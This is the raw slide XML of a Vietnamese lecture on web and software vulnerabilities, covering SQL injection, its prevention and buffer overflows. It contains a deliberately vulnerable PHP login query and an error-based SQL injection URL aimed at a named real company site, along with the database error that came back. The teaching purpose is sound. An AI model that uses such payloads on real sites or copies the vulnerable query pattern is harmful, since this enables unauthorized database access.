              <a:t>: Lỗ hổng SQL Injection là lỗ hổng cho phép những kẻ tấn công lợi dụng lỗ hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các câu lệnh SQL một cách trái phép</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>SQL Injection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22</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18559698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QL Injection Basics Demonstration">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0" y="1200150"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>SQL Injection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23</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21114463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smtClean="0"/>
              <a:t>SQL Injection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24</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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036849"/>
            <a:ext cx="8153400" cy="174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04800" y="762000"/>
            <a:ext cx="8534400" cy="4191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sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uname = isset($_POST['uname']) ? $_POST['uname'] : ""; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>passwd= isset($_POST['passwd']) ? $_POST['passwd']:""; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>query = "SELECT * FROM tbl_users WHERE username = </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	'" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+ $uname + "' AND password = '"+ $passwd +"'"; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>result = @mysqli_query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(!$result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Xác thực thất </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bại</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   elseif</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Xác thực thành </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12347653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smtClean="0"/>
              <a:t>SQL Injection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25</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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389257"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762000" y="1295400"/>
            <a:ext cx="47244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352800" y="4191000"/>
            <a:ext cx="5562600" cy="2133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7937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smtClean="0"/>
              <a:t>SQL Injection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26</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="685800"/>
            <a:ext cx="9144000" cy="6172200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Ví dụ một truy vấn SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3276600"/>
            <a:ext cx="8534400" cy="3048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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'ConsultantArticle' to data type int.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/help.asp, line 26</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1295400"/>
            <a:ext cx="8534400" cy="1676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vi-VN" sz="3200" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.vinamilk.com.vn/?vnm=help&amp;id=32 and 1=convert(int, (select top 1 table_name from information_schema.tables)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>--comment</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3200" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="5105400"/>
            <a:ext cx="3200400" cy="68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1919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itchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Phòng chống SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Lọc dữ liệu đầu vào: sử dụng các bộ lọc có sẵn hoặc tự xây dựng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Kiểm thử: Acunetix Web Vulnerabilty Scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Grabber, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection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27</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15748453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marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Nguyễn Tuấn Anh, Hoàng Thanh Nam, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Xây dựng ứng dụng web an toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>, Học viện KTMM, 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Zalewski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tangled Web. A Guide to Securing Modern Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, No Starch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Press, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2011</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ryan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Barnett</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Preventing Web Attacks with Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, Addison </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Wesley, 2006</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Tài liệu tham khảo</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25474292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marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Joel Scambray, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Hacking Exposed Web Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>, McGraw-Hill, 2002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rolf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Oppliger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Technologies for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Wide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Artech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>, 2003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Web Application Vulnerabilities Detect, Exploit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>, Syngress, 2007</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>....</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Tài liệu tham khảo</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24451032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828826014"/>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392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smtClean="0"/>
              <a:t>Frameworks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30</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Kết quả hình ảnh cho webgo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85800"/>
            <a:ext cx="5571509" cy="34573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bwap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309" y="4199396"/>
            <a:ext cx="7932651"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7481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lgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BÁO CÁO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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49452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4052294275"/>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08196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smtClean="0"/>
              <a:t>Các dạng lỗ hổng phần mềm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33</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Điển hình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Tràn bộ đệm (Buffer Overflow)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Chuỗi định dạng (Format String)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Các dạng khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Integer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Race Conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Weak Cryptography Algorithm/Scheme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14421363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buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Lỗ hổng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>tràn bộ đệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>: Lỗ hổng tràn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>bộ đệm là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>lỗ hổng cho phép </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>dữ liệu xử lý, thường là dữ liệu đầu vào, dài hơn giới hạn của vùng nhớ đệm được cấp phát để chứa nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Lỗ hổng tràn bộ đệm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34</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4283823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y2mate.com - how_to_exploit_a_buffer_overflow_vulnerability_practical_hJ8IwyhqzD4_1080p">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0" y="838200"/>
            <a:ext cx="9144000" cy="5505450"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Lỗ hổng tràn bộ đệm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35</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42008828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Lỗ hổng tràn bộ đệm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36</a:t>
            </a:fld>
